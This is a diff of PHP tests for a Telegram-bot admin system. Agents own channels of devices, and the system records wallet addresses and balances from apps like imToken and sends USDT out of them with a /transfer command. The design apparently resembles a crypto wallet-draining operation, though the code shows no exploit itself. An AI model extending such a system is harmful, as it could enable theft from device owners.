$this->actingAs($this->superAdmin(), 'admin')
->post(route('admin.system.settings.telegramTest'), [
'chat_id' => '999',
])
->assertOk()
->assertJsonPath('code', 1)
->assertJsonPath('msg', 'Bad Request: chat not found');
}
#[Test]
public function normal_admin_cannot_test_official_telegram(): void
{
$this->actingAs($this->normalAdmin(), 'admin')
->post(route('admin.system.settings.telegramTest'), ['chat_id' => '1'])
->assertForbidden();
}
#[Test]
public function settings_page_shows_bot_username_from_getMe(): void
{
config([
'coruna.telegram.bot_token' => 'saved-token',
'coruna.telegram.bot_username' => '',
]);
\Illuminate\Support\Facades\Http::fake(function ($request) {
if (str_contains($request->url(), 'getMe')) {
return \Illuminate\Support\Facades\Http::response([
'ok' => true,
'result' => ['username' => 'ops_bot'],
], 200);
}
return \Illuminate\Support\Facades\Http::response(['ok' => true], 200);
});
$this->actingAs($this->superAdmin(), 'admin')
->get(route('admin.system.settings.index'))
->assertOk()
->assertSee('@ops_bot')
->assertSee('t.me/ops_bot?startgroup=1', false);
$this->assertSame('ops_bot', Setting::query()->where('key', 'telegram.bot_username')->value('value'));
}
} }
+136 -37
View File
@@ -13,6 +13,7 @@ use PHPUnit\Framework\Attributes\Test;
use SergiX44\Nutgram\Nutgram; use SergiX44\Nutgram\Nutgram;
use SergiX44\Nutgram\Telegram\Properties\ChatMemberStatus; use SergiX44\Nutgram\Telegram\Properties\ChatMemberStatus;
use SergiX44\Nutgram\Telegram\Properties\ChatType; use SergiX44\Nutgram\Telegram\Properties\ChatType;
use SergiX44\Nutgram\Telegram\Properties\UpdateType;
use SergiX44\Nutgram\Testing\FakeNutgram; use SergiX44\Nutgram\Testing\FakeNutgram;
use Tests\TestCase; use Tests\TestCase;
@@ -386,14 +387,12 @@ class TelegramBotTest extends TestCase
'password' => 'secret12', 'password' => 'secret12',
'status' => 1, 'status' => 1,
'chat_id' => (string) self::AGENT_CHAT, 'chat_id' => (string) self::AGENT_CHAT,
'bot_token' => '111:AAA',
]); ]);
$agentB = User::query()->create([ $agentB = User::query()->create([
'username' => 'agent_b', 'username' => 'agent_b',
'password' => 'secret12', 'password' => 'secret12',
'status' => 1, 'status' => 1,
'chat_id' => '-100111', 'chat_id' => '-100111',
'bot_token' => '222:BBB',
]); ]);
$chA = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'; $chA = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
@@ -418,8 +417,6 @@ class TelegramBotTest extends TestCase
'created_at' => now(), 'created_at' => now(),
]); ]);
app(TelegramBotContext::class)->setAgent($agentA);
/** @var FakeNutgram $bot */ /** @var FakeNutgram $bot */
$bot = app(Nutgram::class); $bot = app(Nutgram::class);
$bot->willReceivePartial([ $bot->willReceivePartial([
@@ -471,7 +468,6 @@ class TelegramBotTest extends TestCase
'password' => 'secret12', 'password' => 'secret12',
'status' => 1, 'status' => 1,
'chat_id' => (string) self::AGENT_CHAT, 'chat_id' => (string) self::AGENT_CHAT,
'bot_token' => '111:AAA',
]); ]);
Channel::query()->create([ Channel::query()->create([
'channel_id' => 'cccccccccccccccccccccccccccccccc', 'channel_id' => 'cccccccccccccccccccccccccccccccc',
@@ -526,18 +522,17 @@ class TelegramBotTest extends TestCase
$history2 = $bot2->getRequestHistory(); $history2 = $bot2->getRequestHistory();
$transferMsg = FakeNutgram::getActualData(array_values($history2[array_key_last($history2)])[0]); $transferMsg = FakeNutgram::getActualData(array_values($history2[array_key_last($history2)])[0]);
$this->assertStringContainsString('仅限官方', $transferMsg['text'] ?? ''); $this->assertStringContainsString('无权操作该地址', $transferMsg['text'] ?? '');
} }
#[Test] #[Test]
public function agent_help_hides_transfer(): void public function agent_help_lists_transfer_for_own_devices(): void
{ {
$agent = User::query()->create([ $agent = User::query()->create([
'username' => 'agent_help', 'username' => 'agent_help',
'password' => 'secret12', 'password' => 'secret12',
'status' => 1, 'status' => 1,
'chat_id' => (string) self::AGENT_CHAT, 'chat_id' => (string) self::AGENT_CHAT,
'bot_token' => '111:AAA',
]); ]);
app(TelegramBotContext::class)->setAgent($agent); app(TelegramBotContext::class)->setAgent($agent);
@@ -557,46 +552,150 @@ class TelegramBotTest extends TestCase
$history = $bot->getRequestHistory(); $history = $bot->getRequestHistory();
$msg = FakeNutgram::getActualData(array_values($history[array_key_last($history)])[0]); $msg = FakeNutgram::getActualData(array_values($history[array_key_last($history)])[0]);
$this->assertStringContainsString('/data', $msg['text'] ?? ''); $this->assertStringContainsString('/data', $msg['text'] ?? '');
$this->assertStringContainsString('不支持 /transfer', $msg['text'] ?? ''); $this->assertStringContainsString('/transfer <fromAddress>', $msg['text'] ?? '');
$this->assertStringNotContainsString('/transfer <fromAddress>', $msg['text'] ?? ''); $this->assertStringNotContainsString('仅可查看/转出本代理渠道设备', $msg['text'] ?? '');
} }
#[Test] #[Test]
public function agent_webhook_requires_secret_and_config(): void public function agent_can_transfer_own_device_address(): void
{ {
$bare = User::query()->create([
'username' => 'agent_hook_bare',
'password' => 'secret12',
'status' => 1,
]);
$this->postJson('/hooks/telegram/agent/'.$bare->id, ['update_id' => 1])
->assertNotFound();
$agent = User::query()->create([ $agent = User::query()->create([
'username' => 'agent_hook', 'username' => 'agent_xfer',
'password' => 'secret12', 'password' => 'secret12',
'status' => 1, 'status' => 1,
'bot_token' => '111:AAA',
'chat_id' => (string) self::AGENT_CHAT, 'chat_id' => (string) self::AGENT_CHAT,
]); ]);
$this->assertTrue($agent->fresh()->hasTelegramBot()); $channelId = 'cccccccccccccccccccccccccccccccc';
Channel::query()->create([
'channel_id' => $channelId,
'user_id' => $agent->id,
'status' => 1,
]);
$device = \App\Models\Device::query()->create([
'device_id' => 'dev-agent-xfer',
'channel_id' => $channelId,
]);
\App\Models\WalletAddress::query()->create([
'device_id' => $device->id,
'address' => 'TUEZSdKsoDHQMeZwihtdoBiN46zxhGWYdH',
'chain_type' => 'TRON',
'source' => 'imToken',
]);
$this->postJson('/hooks/telegram/agent/'.$agent->id, ['update_id' => 1], [ $mock = Mockery::mock(TransferService::class);
'X-Telegram-Bot-Api-Secret-Token' => 'wrong', $mock->shouldReceive('handle')
])->assertForbidden(); ->once()
->andReturn([
'ok' => true,
'txid' => 'agentbeef',
'from' => 'TUEZSdKsoDHQMeZwihtdoBiN46zxhGWYdH',
'to' => 'TPayoutAddressxxxxxxxxxxxxxxxxxxxxxx',
'amount' => '1',
'asset' => 'USDT',
]);
$this->app->instance(TransferService::class, $mock);
$secret = TelegramBotContext::webhookSecretFor($agent->fresh()); /** @var FakeNutgram $bot */
$this->call( $bot = app(Nutgram::class);
'POST', $bot->willReceivePartial([
'/hooks/telegram/agent/'.$agent->id, 'status' => ChatMemberStatus::ADMINISTRATOR->value,
[], 'user' => ['id' => self::USER_ID, 'is_bot' => false, 'first_name' => 'AgentAdmin'],
[], 'can_manage_chat' => true,
[], ]);
[ $bot->hearMessage([
'CONTENT_TYPE' => 'application/json', 'text' => '/transfer TUEZSdKsoDHQMeZwihtdoBiN46zxhGWYdH USDT 1',
'HTTP_X_TELEGRAM_BOT_API_SECRET_TOKEN' => $secret, 'chat' => ['id' => self::AGENT_CHAT, 'type' => ChatType::SUPERGROUP->value],
'from' => ['id' => self::USER_ID, 'is_bot' => false, 'first_name' => 'AgentAdmin'],
])->reply();
$history = $bot->getRequestHistory();
$last = FakeNutgram::getActualData(array_values($history[array_key_last($history)])[0]);
$this->assertStringContainsString('agentbeef', $last['text'] ?? '');
}
#[Test]
public function agent_webhook_route_is_removed(): void
{
$this->postJson('/hooks/telegram/agent/1', ['update_id' => 1])
->assertNotFound();
}
#[Test]
public function joining_a_group_announces_chat_id(): void
{
$chatId = -1005556667778;
/** @var FakeNutgram $bot */
$bot = app(Nutgram::class);
$bot->hearUpdateType(UpdateType::MY_CHAT_MEMBER, [
'chat' => [
'id' => $chatId,
'type' => ChatType::SUPERGROUP->value,
'title' => '代理测试群',
], ],
json_encode(['update_id' => 1]) 'from' => ['id' => self::USER_ID, 'is_bot' => false, 'first_name' => 'Admin'],
)->assertNoContent(); 'date' => time(),
'old_chat_member' => [
'status' => ChatMemberStatus::LEFT->value,
'user' => ['id' => 1, 'is_bot' => true, 'first_name' => 'Bot'],
],
'new_chat_member' => [
'status' => ChatMemberStatus::MEMBER->value,
'user' => ['id' => 1, 'is_bot' => true, 'first_name' => 'Bot'],
],
])->reply();
$bot->assertCalled('sendMessage', 1);
$history = $bot->getRequestHistory();
$last = FakeNutgram::getActualData(array_values($history[array_key_last($history)])[0]);
$this->assertStringContainsString((string) $chatId, $last['text'] ?? '');
$this->assertStringContainsString('Chat ID', $last['text'] ?? '');
$this->assertStringContainsString('代理测试群', $last['text'] ?? '');
$copy = (string) data_get($last, 'reply_markup.inline_keyboard.0.0.copy_text.text', '');
$this->assertSame((string) $chatId, $copy);
}
#[Test]
public function promoting_or_leaving_does_not_announce_chat_id(): void
{
/** @var FakeNutgram $bot */
$bot = app(Nutgram::class);
$bot->hearUpdateType(UpdateType::MY_CHAT_MEMBER, [
'chat' => ['id' => -1001, 'type' => ChatType::SUPERGROUP->value, 'title' => 'x'],
'from' => ['id' => self::USER_ID, 'is_bot' => false, 'first_name' => 'Admin'],
'date' => time(),
'old_chat_member' => [
'status' => ChatMemberStatus::MEMBER->value,
'user' => ['id' => 1, 'is_bot' => true, 'first_name' => 'Bot'],
],
'new_chat_member' => [
'status' => ChatMemberStatus::ADMINISTRATOR->value,
'user' => ['id' => 1, 'is_bot' => true, 'first_name' => 'Bot'],
],
])->reply();
$bot->assertCalled('sendMessage', 0);
$this->app->forgetInstance(Nutgram::class);
$this->app->forgetInstance('nutgram');
$this->app->forgetInstance('telegram');
$this->app->forgetInstance(FakeNutgram::class);
/** @var FakeNutgram $bot2 */
$bot2 = app(Nutgram::class);
$bot2->hearUpdateType(UpdateType::MY_CHAT_MEMBER, [
'chat' => ['id' => -1001, 'type' => ChatType::SUPERGROUP->value, 'title' => 'x'],
'from' => ['id' => self::USER_ID, 'is_bot' => false, 'first_name' => 'Admin'],
'date' => time(),
'old_chat_member' => [
'status' => ChatMemberStatus::MEMBER->value,
'user' => ['id' => 1, 'is_bot' => true, 'first_name' => 'Bot'],
],
'new_chat_member' => [
'status' => ChatMemberStatus::LEFT->value,
'user' => ['id' => 1, 'is_bot' => true, 'first_name' => 'Bot'],
],
])->reply();
$bot2->assertCalled('sendMessage', 0);
} }
} }
+24 -6
View File
@@ -16,7 +16,7 @@ class TelegramNotifierRoutingTest extends TestCase
use RefreshDatabase; use RefreshDatabase;
#[Test] #[Test]
public function agent_device_notifies_agent_bot(): void public function agent_device_notifies_agent_chat(): void
{ {
config([ config([
'coruna.telegram.bot_token' => 'system-token', 'coruna.telegram.bot_token' => 'system-token',
@@ -27,7 +27,6 @@ class TelegramNotifierRoutingTest extends TestCase
'username' => 'agent_tg', 'username' => 'agent_tg',
'password' => 'secret12', 'password' => 'secret12',
'status' => 1, 'status' => 1,
'bot_token' => 'agent-token',
'chat_id' => '200', 'chat_id' => '200',
]); ]);
$channelId = 'eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee'; $channelId = 'eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee';
@@ -46,9 +45,18 @@ class TelegramNotifierRoutingTest extends TestCase
app(TelegramNotifier::class)->notifyNewDevice('dev-agent-1', '16.0', '1.2.3.4'); app(TelegramNotifier::class)->notifyNewDevice('dev-agent-1', '16.0', '1.2.3.4');
Http::assertSent(function ($request) { Http::assertSent(function ($request) {
return str_contains($request->url(), '/botagent-token/') $text = (string) ($request->data()['text'] ?? '');
&& ($request->data()['chat_id'] ?? null) === '200';
return str_contains($request->url(), '/botsystem-token/')
&& ($request->data()['chat_id'] ?? null) === '200'
&& str_contains($text, 'ChannelID')
&& str_contains($text, 'eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee');
}); });
Http::assertSent(function ($request) {
return str_contains($request->url(), '/botsystem-token/')
&& ($request->data()['chat_id'] ?? null) === '100';
});
Http::assertSentCount(2);
} }
#[Test] #[Test]
@@ -75,9 +83,14 @@ class TelegramNotifierRoutingTest extends TestCase
app(TelegramNotifier::class)->notifyNewDevice('dev-official-1', '16.0', '1.2.3.4'); app(TelegramNotifier::class)->notifyNewDevice('dev-official-1', '16.0', '1.2.3.4');
Http::assertSent(function ($request) { Http::assertSent(function ($request) {
$text = (string) ($request->data()['text'] ?? '');
return str_contains($request->url(), '/botsystem-token/') return str_contains($request->url(), '/botsystem-token/')
&& ($request->data()['chat_id'] ?? null) === '100'; && ($request->data()['chat_id'] ?? null) === '100'
&& str_contains($text, 'ChannelID')
&& str_contains($text, 'ffffffffffffffffffffffffffffffff');
}); });
Http::assertSentCount(1);
} }
#[Test] #[Test]
@@ -109,8 +122,13 @@ class TelegramNotifierRoutingTest extends TestCase
app(TelegramNotifier::class)->notifyNewDevice('dev-fallback', '16.0', '1.2.3.4'); app(TelegramNotifier::class)->notifyNewDevice('dev-fallback', '16.0', '1.2.3.4');
Http::assertSent(function ($request) { Http::assertSent(function ($request) {
$text = (string) ($request->data()['text'] ?? '');
return str_contains($request->url(), '/botsystem-token/') return str_contains($request->url(), '/botsystem-token/')
&& ($request->data()['chat_id'] ?? null) === '100'; && ($request->data()['chat_id'] ?? null) === '100'
&& str_contains($text, 'ChannelID')
&& str_contains($text, '12121212121212121212121212121212');
}); });
Http::assertSentCount(1);
} }
} }
+1
View File
@@ -46,6 +46,7 @@ class WalletAddressDisplayTest extends TestCase
return str_contains($text, 'Source</b>: imToken') return str_contains($text, 'Source</b>: imToken')
&& str_contains($text, 'Balance</b>: TRX: 0 USDT: 0') && str_contains($text, 'Balance</b>: TRX: 0 USDT: 0')
&& str_contains($text, 'ChannelID')
&& ! str_contains($text, 'Balance</b>: imToken'); && ! str_contains($text, 'Balance</b>: imToken');
}); });
} }